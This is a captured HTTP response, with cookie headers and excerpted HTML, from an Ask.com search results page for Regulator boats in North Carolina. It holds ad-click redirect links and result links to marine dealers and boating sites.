Set-Cookie: clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:33:58 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:33:58 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjMzOjU4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:33:58 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:33:58 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 140357

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=regulator+boat+north+carolina"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a001',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...

<img src="http://4.afs.googleadservices.com/images/partners/CPXStL-Q26YCFYGo4AodiH9H9A/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>

<span class="T7 fr tp info txt0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CBcTIpshBTfXnGIHRggeI_52iD8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QJ2Mm19eIt88fxnwF-VMVLTmdwpU&num=1&sig=AGiWqtze32AnFMFHBQecM1Ts5ijRpu1ILg&adurl=http://www.AtlanticMarineSales.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(30); if (typeof efclk != 'undefined') efclk(30); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_0');" class="nu" onmouseover="return ss('www.atlanticmarinesales.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CBcTIpshBTfXnGIHRggeI_52iD8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QJ2Mm19eIt88fxnwF-VMVLTmdwpU&num=1&sig=AGiWqtze32AnFMFHBQecM1Ts5ijRpu1ILg&adurl=http://www.AtlanticMarineSales.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(30); if (typeof efclk != 'undefined') efclk(30); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_0');" class="nu" onmouseover="return ss('www.atlanticmarinesales.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=Ca9pxpshBTfXnGIHRggeI_52iD8mNwHPR0I-RDdbRiAcQAiD7_oEDKAVQlbmT_wZgyYaAgKQkyAEBqQIb5ln_5sK6PqoEG0_QJ0Zs19SAti4d_Z_3kV77mBbMz8jcNapfKA&num=2&sig=AGiWqtyxBsoR2RxYtwOSmJPTlbjoOczX6g&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(36); if (typeof efclk != 'undefined') efclk(36); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_1');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Ca9pxpshBTfXnGIHRggeI_52iD8mNwHPR0I-RDdbRiAcQAiD7_oEDKAVQlbmT_wZgyYaAgKQkyAEBqQIb5ln_5sK6PqoEG0_QJ0Zs19SAti4d_Z_3kV77mBbMz8jcNapfKA&num=2&sig=AGiWqtyxBsoR2RxYtwOSmJPTlbjoOczX6g&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(36); if (typeof efclk != 'undefined') efclk(36); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_1');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CnJ4mpshBTfXnGIHRggeI_52iD42hwtsBtZCmiRy1kPfZJxADIPv-gQMoBVDI4ZSn_P____8BYMmGgICkJMgBAaoEGE_QJ3Ij19WAty4dpJ5Nqa7xd7ApHX2L-Q&num=3&sig=AGiWqtwJkZvMCM3a4nLjjEALMI8I912qSw&adurl=http://northcarolina.localguides.com/ypcyellow/controls_control_systems_regulators.html%3Futm_source%3Dgoogle_state%26utm_medium%3Dcpc%26utm_campaign%3Dypc" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_2');" class="nu" onmouseover="return ss('www.localguides.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CnJ4mpshBTfXnGIHRggeI_52iD42hwtsBtZCmiRy1kPfZJxADIPv-gQMoBVDI4ZSn_P____8BYMmGgICkJMgBAaoEGE_QJ3Ij19WAty4dpJ5Nqa7xd7ApHX2L-Q&num=3&sig=AGiWqtwJkZvMCM3a4nLjjEALMI8I912qSw&adurl=http://northcarolina.localguides.com/ypcyellow/controls_control_systems_regulators.html%3Futm_source%3Dgoogle_state%26utm_medium%3Dcpc%26utm_campaign%3Dypc" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_2');" class="nu" onmouseover="return ss('www.localguides.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CbXCppshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&sig=AGiWqty9AU2z5HQ5Av4iaTnBSBRtihQRQw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=CbXCppshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&sig=AGiWqty9AU2z5HQ5Av4iaTnBSBRtihQRQw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C03N8pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqtx7fvkjq-FPUXetrx0rBHLCTXekSA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C03N8pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqtx7fvkjq-FPUXetrx0rBHLCTXekSA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=Cj5VipshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtxc61gShCpVjAqxz9VqeZ9M5wOUhQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=Cj5VipshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtxc61gShCpVjAqxz9VqeZ9M5wOUhQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CygR9pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtyRJ8QfhDv5_bWQ-EfPU6s60-F5AQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CygR9pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtyRJ8QfhDv5_bWQ-EfPU6s60-F5AQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CvI3VpshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqty8pQ7Y8Lj6tCO7EnzMk1Y_6BqUwQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CvI3VpshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqty8pQ7Y8Lj6tCO7EnzMk1Y_6BqUwQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CoKhbpshBTfXnGIHRggeI_52iD4r8pMUBor7AiBLmnfAEEAUg-_6BAygFUNv0seIEYMmGgICkJMgBAaoEG0_QFw8w19OAti4d_Z_3kV77mBbMz8jcNapfKA&num=5&sig=AGiWqtxMUb81cAfa3sGbosfNazzLWyplZA&adurl=http://www.boatcourse.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(14); if (typeof efclk != 'undefined') efclk(14); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_4');" class="nu" onmouseover="return ss('www.<b>boat</b>course.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CoKhbpshBTfXnGIHRggeI_52iD4r8pMUBor7AiBLmnfAEEAUg-_6BAygFUNv0seIEYMmGgICkJMgBAaoEG0_QFw8w19OAti4d_Z_3kV77mBbMz8jcNapfKA&num=5&sig=AGiWqtxMUb81cAfa3sGbosfNazzLWyplZA&adurl=http://www.boatcourse.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(14); if (typeof efclk != 'undefined') efclk(14); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_4');" class="nu" onmouseover="return ss('www.<b>boat</b>course.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/quality.html"
onmousedown="return fp(this,{en:'in',io:'0',b:'a002',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r2_t" href="http://www.starlingmarine.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a003',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Starling Marine - Wilmington <b>
...[SNIP]...
<td>

<a id="r3_t" href="http://www.atlanticmarinesales.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a004',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Atlantic Marine Sales » Wrightsville Beach, <b>
...[SNIP]...
<td>

<a id="r4_t" href="http://govguru.com/north-carolina/boat-registration"
onmousedown="return fp(this,{en:'te',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r5_t" href="http://www.tunaduck.com/boat.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Tuna Duck Charter Fishing <b>
...[SNIP]...
<td>

<a id="r6_t" href="http://www.tunaduck.com/links.html"
onmousedown="return fp(this,{en:'in',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Tuna Duck Charter Fishing <b>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.marine-world.com/brokers/589.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Atlantic Marine Sales - is your coastal <b>
...[SNIP]...
<td>

<a id="r9_t" href="http://companydatabase.org/c/communications-services-nec/marine-operators/marine-offshore/quality-marine/north-carolina/manufacturing-facility/regulator-marine.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Company: <b>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CBcTIpshBTfXnGIHRggeI_52iD8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QJ2Mm19eIt88fxnwF-VMVLTmdwpU&num=1&sig=AGiWqtze32AnFMFHBQecM1Ts5ijRpu1ILg&adurl=http://www.AtlanticMarineSales.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(2); if (typeof efclk != 'undefined') efclk(2); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_0');" class="nu" onmouseover="return ss('www.atlanticmarinesales.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CBcTIpshBTfXnGIHRggeI_52iD8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QJ2Mm19eIt88fxnwF-VMVLTmdwpU&num=1&sig=AGiWqtze32AnFMFHBQecM1Ts5ijRpu1ILg&adurl=http://www.AtlanticMarineSales.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(2); if (typeof efclk != 'undefined') efclk(2); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_0');" class="nu" onmouseover="return ss('www.atlanticmarinesales.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=Ca9pxpshBTfXnGIHRggeI_52iD8mNwHPR0I-RDdbRiAcQAiD7_oEDKAVQlbmT_wZgyYaAgKQkyAEBqQIb5ln_5sK6PqoEG0_QJ0Zs19SAti4d_Z_3kV77mBbMz8jcNapfKA&num=2&sig=AGiWqtyxBsoR2RxYtwOSmJPTlbjoOczX6g&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(62); if (typeof efclk != 'undefined') efclk(62); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_1');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Ca9pxpshBTfXnGIHRggeI_52iD8mNwHPR0I-RDdbRiAcQAiD7_oEDKAVQlbmT_wZgyYaAgKQkyAEBqQIb5ln_5sK6PqoEG0_QJ0Zs19SAti4d_Z_3kV77mBbMz8jcNapfKA&num=2&sig=AGiWqtyxBsoR2RxYtwOSmJPTlbjoOczX6g&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(62); if (typeof efclk != 'undefined') efclk(62); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_1');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CnJ4mpshBTfXnGIHRggeI_52iD42hwtsBtZCmiRy1kPfZJxADIPv-gQMoBVDI4ZSn_P____8BYMmGgICkJMgBAaoEGE_QJ3Ij19WAty4dpJ5Nqa7xd7ApHX2L-Q&num=3&sig=AGiWqtwJkZvMCM3a4nLjjEALMI8I912qSw&adurl=http://northcarolina.localguides.com/ypcyellow/controls_control_systems_regulators.html%3Futm_source%3Dgoogle_state%26utm_medium%3Dcpc%26utm_campaign%3Dypc" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(98); if (typeof efclk != 'undefined') efclk(98); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_2');" class="nu" onmouseover="return ss('www.localguides.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CnJ4mpshBTfXnGIHRggeI_52iD42hwtsBtZCmiRy1kPfZJxADIPv-gQMoBVDI4ZSn_P____8BYMmGgICkJMgBAaoEGE_QJ3Ij19WAty4dpJ5Nqa7xd7ApHX2L-Q&num=3&sig=AGiWqtwJkZvMCM3a4nLjjEALMI8I912qSw&adurl=http://northcarolina.localguides.com/ypcyellow/controls_control_systems_regulators.html%3Futm_source%3Dgoogle_state%26utm_medium%3Dcpc%26utm_campaign%3Dypc" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(98); if (typeof efclk != 'undefined') efclk(98); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_2');" class="nu" onmouseover="return ss('www.localguides.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CbXCppshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&sig=AGiWqty9AU2z5HQ5Av4iaTnBSBRtihQRQw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(26); if (typeof efclk != 'undefined') efclk(26); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=CbXCppshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&sig=AGiWqty9AU2z5HQ5Av4iaTnBSBRtihQRQw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(26); if (typeof efclk != 'undefined') efclk(26); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
